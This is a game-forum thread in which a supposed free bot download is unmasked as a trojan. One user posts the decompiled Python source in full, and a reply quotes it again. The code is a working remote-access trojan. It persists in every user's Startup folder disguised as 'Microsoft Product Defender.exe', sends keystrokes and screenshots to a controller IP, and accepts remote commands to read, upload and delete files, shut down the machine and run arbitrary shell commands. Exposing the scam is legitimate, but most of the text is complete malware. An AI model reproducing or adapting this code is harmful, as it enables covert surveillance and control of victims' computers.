Free SroKing bot is back. Download beta.

06/18/2016 03:12 peceter#1
---removed---
06/18/2016 03:31 ​Exo#2
Well well well
[Only registered and activated users can see links. Click Here To Register...]
06/18/2016 04:24 qaba55#3
thx bro for bot :) i will try it

i just try it but SroKing.exe dos not work :( i don't know whay
it wan't run :( plz help and thx
06/18/2016 12:21 husseinayman#4
it wasn't run
06/18/2016 13:44 husseinayman#5
PW rejected it give me this mes in hamachi
06/18/2016 22:58 florian0#6
Code:
0025B28C  00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A   ••••(••••s[•••C:
0025B29C  5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65   \Users\Damian\De
0025B2AC  73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72   sktop\HackSpy Tr
0025B2BC  6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74   ojan Exploit\dat
0025B2CC  61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61   a\lib\site-packa
0025B2DC  67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F   ges\py2exe\boot_
0025B2EC  63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00   common.pyR••••2•
u sure bro?

Edit: Next level

boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':

    class Stderr(object):
        softspace = 0
        _file = None
        _error = None

        def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
            if self._file is None and self._error is None:
                try:
                    self._file = open(fname, 'a')
                except Exception as details:
                    self._error = details
                    import atexit
                    atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
                else:
                    import atexit
                    atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')

            if self._file is not None:
                self._file.write(text)
                self._file.flush()
            return

        def flush(self):
            if self._file is not None:
                self._file.flush()
            return


    sys.stderr = Stderr()
    del sys._MessageBox
    del Stderr

    class Blackhole(object):
        softspace = 0

        def write(self, text):
            pass

        def flush(self):
            pass


    sys.stdout = Blackhole()
    del Blackhole
del sys
import linecache

def fake_getline(filename, lineno, module_globals = None):
    return ''


linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
    sys.stderr = open('D:\\my_stderr.log', 'w')
except:
    pass

class _Popen(forking.Popen):

    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    _Popen = _Popen


def if_startup():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    loop = 'on'
    while loop == 'on':
        try:
            sleep(1)
            server.connect((ip, 8081))
            loop = 'off'
        except:
            pass

    def back_dir(current_path):
        c = current_path.split('\\')
        new_path = ''
        i = 0
        while i < len(c) - 1:
            if i != 0:
                new_path = new_path + '\\' + c[i]
            else:
                new_path = c[i]
            i += 1

        os.chdir(new_path)

    def attack1():
        server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop1 = 'on'
        while loop1 == 'on':
            try:
                sleep(1)
                server1.connect((ip, 10000))
                loop1 = 'off'
            except:
                pass

        def OnKeyboardEvent(event):
            k = chr(event.Ascii)
            server1.send(k)
            return None

        hooks_manager = pyHook.HookManager()
        hooks_manager.KeyDown = OnKeyboardEvent
        hooks_manager.HookKeyboard()
        pythoncom.PumpMessages()

    def attack2():
        server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop3 = 'on'
        while loop3 == 'on':
            try:
                sleep(1)
                server3.connect((ip, 4444))
                loop3 = 'off'
            except:
                pass

            time_interval = 3
            try:
                time_interval = server3.recv(1024)
            except:
                pass

            while True:
                sleep(float(time_interval))
                bitmap = autopy.bitmap.capture_screen()
                bitmap.save('1.png')
                with open('1.png', 'rb') as f:
                    bytes_to_send = f.read(1024)
                    server3.send(bytes_to_send)
                    while bytes_to_send != '':
                        bytes_to_send = f.read(1024)
                        if bytes_to_send == '':
                            server3.send('stop it')
                        else:
                            server3.send(bytes_to_send)

    def attack3():
        server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop4 = 'on'
        while loop4 == 'on':
            try:
                sleep(1)
                server4.connect((ip, 10008))
                loop4 = 'off'
            except:
                pass

        while True:
            command = server4.recv(1024)
            if command == 'cd..':
                try:
                    back_dir(os.getcwd())
                except:
                    pass

            elif command[:3] == 'cd ':
                try:
                    os.chdir(command[3:])
                except:
                    pass

            elif command == 'ls':
                data = os.listdir(os.getcwd())
                i = 0
                d = ''
                while i < len(data):
                    d = d + '$$%%' + data[i]
                    i += 1

                server4.send(d)
            elif command[:4] == 'get ':
                f = open(command[4:], 'rb')
                size = os.path.getsize(command[4:])
                server4.send(str(size))
                data = f.read(2048)
                server4.send(data)
                while data != '':
                    data = ''
                    data = f.read(2048)
                    if data == '':
                        server4.send('stop it')
                    else:
                        server4.send(data)

            elif command[:6] == 'mkdir ':
                os.mkdir(command[6:])
            elif command[:7] == 'upload ':
                size = server4.recv(1024)
                data = server4.recv(2048)
                while data[-7:] != 'stop it':
                    f = open(command[7:], 'ab')
                    f.write(data)
                    f.close()
                    data = ''
                    data = server4.recv(2048)

            elif command == 'pwd':
                path = os.getcwd()
                server4.send(path)
            elif command[:5] == 'del_d':
                try:
                    os.rmtree(command[6:])
                except:
                    pass

            elif command[:5] == 'del_f':
                try:
                    os.remove(command[6:])
                except:
                    pass

            elif command == 'shutdown':
                os.system('shutdown -s')
            elif command[:4] == 'cmd ':
                try:
                    print command[4:]
                    os.system(command[4:])
                except:
                    pass

    count = 0
    server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        if count == 1:
            loop0 = 'on'
            while loop0 == 'on':
                try:
                    sleep(1)
                    server2.connect((ip, 8081))
                    option = server2.recv(1024)
                    loop0 = 'off'
                except:
                    pass

            count = 2
        elif count == 0:
            option = server.recv(1024)
            count = 1
        elif count == 2:
            loop6 = 'on'
            while loop6 == 'on':
                try:
                    print 'done'
                    sleep(1)
                    server6.connect((ip, 8081))
                    option = server6.recv(1024)
                    loop6 = 'off'
                except:
                    pass

            count = 1
        if option == '1':
            t = Thread(target=attack1)
            t.start()
        elif option == '2':
            t = Thread(target=attack2)
            t.start()
        elif option == '3':
            t = Thread(target=attack3)
            t.start()


if os.getcwd()[-7:] == 'Startup':
    atexit.register(if_startup)
else:
    try:
        s = os.getcwd()
        fi = inspect.stack()[0][1]
        present_file = fi.split('/')
        source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
        dest = 'Microsoft Product Defender.exe'
        os.chdir('C:\\Users')
        hostlist = os.listdir('.')
        for i in hostlist:
            try:
                os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
                shutil.copy2(source, dest)
                f = open('windows.bat', 'w')
                f.write('@echo off\n')
                f.write('"Microsoft Product Defender.exe"')
                f.close()
            except:
                pass

    except:
        pass

    atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".

Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding :D:D:D
06/18/2016 23:35 PortalDark#7
Quote:
Originally Posted by florian0 View Post
Code:
0025B28C  00 00 00 00 28 00 00 00 00 73 5B 00 00 00 43 3A   ••••(••••s[•••C:
0025B29C  5C 55 73 65 72 73 5C 44 61 6D 69 61 6E 5C 44 65   \Users\Damian\De
0025B2AC  73 6B 74 6F 70 5C 48 61 63 6B 53 70 79 20 54 72   sktop\HackSpy Tr
0025B2BC  6F 6A 61 6E 20 45 78 70 6C 6F 69 74 5C 64 61 74   ojan Exploit\dat
0025B2CC  61 5C 6C 69 62 5C 73 69 74 65 2D 70 61 63 6B 61   a\lib\site-packa
0025B2DC  67 65 73 5C 70 79 32 65 78 65 5C 62 6F 6F 74 5F   ges\py2exe\boot_
0025B2EC  63 6F 6D 6D 6F 6E 2E 70 79 52 0A 00 00 00 32 00   common.pyR••••2•
u sure bro?

Edit: Next level

boot_common.py
Code:
# Embedded file name: C:\Users\Damian\Desktop\HackSpy Trojan Exploit\data\lib\site-packages\py2exe\boot_common.py
import sys
if sys.frozen == 'windows_exe':

    class Stderr(object):
        softspace = 0
        _file = None
        _error = None

        def write(self, text, alert = sys._MessageBox, fname = sys.executable + '.log'):
            if self._file is None and self._error is None:
                try:
                    self._file = open(fname, 'a')
                except Exception as details:
                    self._error = details
                    import atexit
                    atexit.register(alert, 0, "The logfile '%s' could not be opened:\n %s" % (fname, details), 'Errors occurred')
                else:
                    import atexit
                    atexit.register(alert, 0, "See the logfile '%s' for details" % fname, 'Errors occurred')

            if self._file is not None:
                self._file.write(text)
                self._file.flush()
            return

        def flush(self):
            if self._file is not None:
                self._file.flush()
            return


    sys.stderr = Stderr()
    del sys._MessageBox
    del Stderr

    class Blackhole(object):
        softspace = 0

        def write(self, text):
            pass

        def flush(self):
            pass


    sys.stdout = Blackhole()
    del Blackhole
del sys
import linecache

def fake_getline(filename, lineno, module_globals = None):
    return ''


linecache.orig_getline = linecache.getline
linecache.getline = fake_getline
del linecache
del fake_getline
seq_data.py:
Code:
# Embedded file name: seq_data.py
ip = '10.0.0.3'
import pyHook, pythoncom, sys, logging
import socket
from threading import Thread
from time import sleep
import autopy
import os
import shutil
import inspect
import atexit
import multiprocessing
from multiprocessing import forking
try:
    sys.stderr = open('D:\\my_stderr.log', 'w')
except:
    pass

class _Popen(forking.Popen):

    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    _Popen = _Popen


def if_startup():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    loop = 'on'
    while loop == 'on':
        try:
            sleep(1)
            server.connect((ip, 8081))
            loop = 'off'
        except:
            pass

    def back_dir(current_path):
        c = current_path.split('\\')
        new_path = ''
        i = 0
        while i < len(c) - 1:
            if i != 0:
                new_path = new_path + '\\' + c[i]
            else:
                new_path = c[i]
            i += 1

        os.chdir(new_path)

    def attack1():
        server1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop1 = 'on'
        while loop1 == 'on':
            try:
                sleep(1)
                server1.connect((ip, 10000))
                loop1 = 'off'
            except:
                pass

        def OnKeyboardEvent(event):
            k = chr(event.Ascii)
            server1.send(k)
            return None

        hooks_manager = pyHook.HookManager()
        hooks_manager.KeyDown = OnKeyboardEvent
        hooks_manager.HookKeyboard()
        pythoncom.PumpMessages()

    def attack2():
        server3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop3 = 'on'
        while loop3 == 'on':
            try:
                sleep(1)
                server3.connect((ip, 4444))
                loop3 = 'off'
            except:
                pass

            time_interval = 3
            try:
                time_interval = server3.recv(1024)
            except:
                pass

            while True:
                sleep(float(time_interval))
                bitmap = autopy.bitmap.capture_screen()
                bitmap.save('1.png')
                with open('1.png', 'rb') as f:
                    bytes_to_send = f.read(1024)
                    server3.send(bytes_to_send)
                    while bytes_to_send != '':
                        bytes_to_send = f.read(1024)
                        if bytes_to_send == '':
                            server3.send('stop it')
                        else:
                            server3.send(bytes_to_send)

    def attack3():
        server4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        loop4 = 'on'
        while loop4 == 'on':
            try:
                sleep(1)
                server4.connect((ip, 10008))
                loop4 = 'off'
            except:
                pass

        while True:
            command = server4.recv(1024)
            if command == 'cd..':
                try:
                    back_dir(os.getcwd())
                except:
                    pass

            elif command[:3] == 'cd ':
                try:
                    os.chdir(command[3:])
                except:
                    pass

            elif command == 'ls':
                data = os.listdir(os.getcwd())
                i = 0
                d = ''
                while i < len(data):
                    d = d + '$$%%' + data[i]
                    i += 1

                server4.send(d)
            elif command[:4] == 'get ':
                f = open(command[4:], 'rb')
                size = os.path.getsize(command[4:])
                server4.send(str(size))
                data = f.read(2048)
                server4.send(data)
                while data != '':
                    data = ''
                    data = f.read(2048)
                    if data == '':
                        server4.send('stop it')
                    else:
                        server4.send(data)

            elif command[:6] == 'mkdir ':
                os.mkdir(command[6:])
            elif command[:7] == 'upload ':
                size = server4.recv(1024)
                data = server4.recv(2048)
                while data[-7:] != 'stop it':
                    f = open(command[7:], 'ab')
                    f.write(data)
                    f.close()
                    data = ''
                    data = server4.recv(2048)

            elif command == 'pwd':
                path = os.getcwd()
                server4.send(path)
            elif command[:5] == 'del_d':
                try:
                    os.rmtree(command[6:])
                except:
                    pass

            elif command[:5] == 'del_f':
                try:
                    os.remove(command[6:])
                except:
                    pass

            elif command == 'shutdown':
                os.system('shutdown -s')
            elif command[:4] == 'cmd ':
                try:
                    print command[4:]
                    os.system(command[4:])
                except:
                    pass

    count = 0
    server2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server6 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        if count == 1:
            loop0 = 'on'
            while loop0 == 'on':
                try:
                    sleep(1)
                    server2.connect((ip, 8081))
                    option = server2.recv(1024)
                    loop0 = 'off'
                except:
                    pass

            count = 2
        elif count == 0:
            option = server.recv(1024)
            count = 1
        elif count == 2:
            loop6 = 'on'
            while loop6 == 'on':
                try:
                    print 'done'
                    sleep(1)
                    server6.connect((ip, 8081))
                    option = server6.recv(1024)
                    loop6 = 'off'
                except:
                    pass

            count = 1
        if option == '1':
            t = Thread(target=attack1)
            t.start()
        elif option == '2':
            t = Thread(target=attack2)
            t.start()
        elif option == '3':
            t = Thread(target=attack3)
            t.start()


if os.getcwd()[-7:] == 'Startup':
    atexit.register(if_startup)
else:
    try:
        s = os.getcwd()
        fi = inspect.stack()[0][1]
        present_file = fi.split('/')
        source = str(s) + '\\' + present_file[-1][:-2] + 'exe'
        dest = 'Microsoft Product Defender.exe'
        os.chdir('C:\\Users')
        hostlist = os.listdir('.')
        for i in hostlist:
            try:
                os.chdir('C:\\Users\\' + str(i) + '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup')
                shutil.copy2(source, dest)
                f = open('windows.bat', 'w')
                f.write('@echo off\n')
                f.write('"Microsoft Product Defender.exe"')
                f.close()
            except:
                pass

    except:
        pass

    atexit.register(if_startup)
Wooaaah. It has some screen capture things. Think i gotta stream some *weird* "things".

Edit 2: IP is 10.0.0.3. I thought that hamachi was a troll but the "hacker" is definitily too stupid to make a port forwarding :D:D:D
Thank you

#closed

#content removed